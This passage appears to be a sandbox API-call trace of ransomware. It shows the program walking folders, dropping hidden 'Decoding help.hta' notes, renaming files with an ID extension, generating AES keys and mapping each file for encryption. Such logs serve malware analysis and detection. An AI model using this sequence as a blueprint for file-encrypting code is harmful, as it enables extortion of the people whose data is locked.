halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xeb0 [0062.523] CreateFileMappingA (hFile=0xeb0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xeb4 [0062.523] CryptAcquireContextA (phProv=0x1c31fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 977 os_tid = 0x9b0 [0060.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*", lpFindFileData=0x1c45fd30 | out: lpFindFileData=0x1c45fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558468 [0060.244] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.244] FindNextFileW (in: hFindFile=0x24558468, lpFindFileData=0x1c45fd30 | out: lpFindFileData=0x1c45fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.244] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.244] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.244] FindNextFileW (in: hFindFile=0x24558468, lpFindFileData=0x1c45fd30 | out: lpFindFileData=0x1c45fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1ea6db0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfec5c570, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0060.245] lstrcpyW (in: lpString1=0x9876730, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*" [0060.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*") returned 74 [0060.245] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\Decoding help.hta" [0060.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\decoding help.hta")) returned 0xffffffff [0060.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0060.611] WriteFile (in: hFile=0x5f8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c45fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c45fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.612] CloseHandle (hObject=0x5f8) returned 1 [0060.612] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.612] lstrcmpiW (lpString1="Decoding help.hta", lpString2="deployment.properties") returned -1 [0060.612] lstrlenW (lpString="deployment.properties") returned 21 [0060.612] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*" [0060.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*") returned 74 [0060.612] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\", lpString2="deployment.properties" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" [0060.612] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" [0060.613] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.[ID]g9uZrLhJaygpwRm1[ID]" [0060.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0060.614] CreateFileMappingA (hFile=0x5f8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd80 [0060.614] CryptAcquireContextA (in: phProv=0x1c45fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c45fcec*=0x10e28818) returned 1 [0060.615] CryptGenKey (in: hProv=0x10e28818, Algid=0x6610, dwFlags=0x1, phKey=0x1c45fce8 | out: phKey=0x1c45fce8*=0x10a4ad68) returned 1 [0060.615] CryptExportKey (in: hKey=0x10a4ad68, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1c45fbe4, pdwDataLen=0x1c45fce4 | out: pbData=0x1c45fbe4*, pdwDataLen=0x1c45fce4*=0x2c) returned 1 [0060.615] MapViewOfFile (hFileMappingObject=0xd80, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c0) Thread: id = 978 os_tid = 0xcfc [0060.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*", lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245584a8 [0060.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.249] FindNextFileW (in: hFindFile=0x245584a8, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.249] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.249] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.249] FindNextFileW (in: hFindFile=0x245584a8, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data1.cab", cAlternateFileName="")) returned 1 [0060.249] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*" [0060.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*") returned 75 [0060.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Decoding help.hta" [0060.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\decoding help.hta")) returned 0xffffffff [0060.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa84 [0061.473] WriteFile (in: hFile=0xa84, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d0dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d0dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.474] CloseHandle (hObject=0xa84) returned 1 [0061.474] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.474] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Data1.cab") returned 1 [0061.474] lstrlenW (lpString="Data1.cab") returned 9 [0061.474] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*" [0061.474] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*") returned 75 [0061.474] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\", lpString2="Data1.cab" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" [0061.474] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" [0061.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0061.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa84 [0062.522] CreateFileMappingA (hFile=0xa84, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xea8 [0062.522] CryptAcquireContextA (phProv=0x1d0dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 979 os_tid = 0xd28 [0060.252] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*", lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812b9833, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812b9833, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558568 [0060.252] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.253] FindNextFileW (in: hFindFile=0x24558568, lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812b9833, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812b9833, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.253] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.253] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.253] FindNextFileW (in: hFindFile=0x24558568, lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58775f6b, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x58775f6b, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x77e270fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FrameworkList.xml", cAlternateFileName="")) returned 1 [0060.253] lstrcpyW (in: lpString1=0x97221d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" [0060.253] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned 87 [0060.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta" [0060.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\decoding help.hta")) returned 0xffffffff [0060.253] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa7c [0061.478] WriteFile (in: hFile=0xa7c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2091fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2091fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.479] CloseHandle (hObject=0xa7c) returned 1 [0061.479] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.479] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FrameworkList.xml") returned -1 [0061.479] lstrlenW (lpString="FrameworkList.xml") returned 17 [0061.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" [0061.479] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned 87 [0061.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\", lpString2="FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" [0061.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" [0061.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0061.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.479] FindNextFileW (in: hFindFile=0x24558568, lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58775f6b, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x58775f6b, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x77e270fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FrameworkList.xml", cAlternateFileName="")) returned 0 [0061.479] FindClose (in: hFindFile=0x24558568 | out: hFindFile=0x24558568) returned 1 Thread: id = 980 os_tid = 0x5c4 [0060.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*", lpFindFileData=0x20c5fd30 | out: lpFindFileData=0x20c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812b9833, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812b9833, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245585a8 [0060.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.254] FindNextFileW (in: hFindFile=0x245585a8, lpFindFileData=0x20c5fd30 | out: lpFindFileData=0x20c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812b9833, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812b9833, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.254] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.254] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.254] FindNextFileW (in: 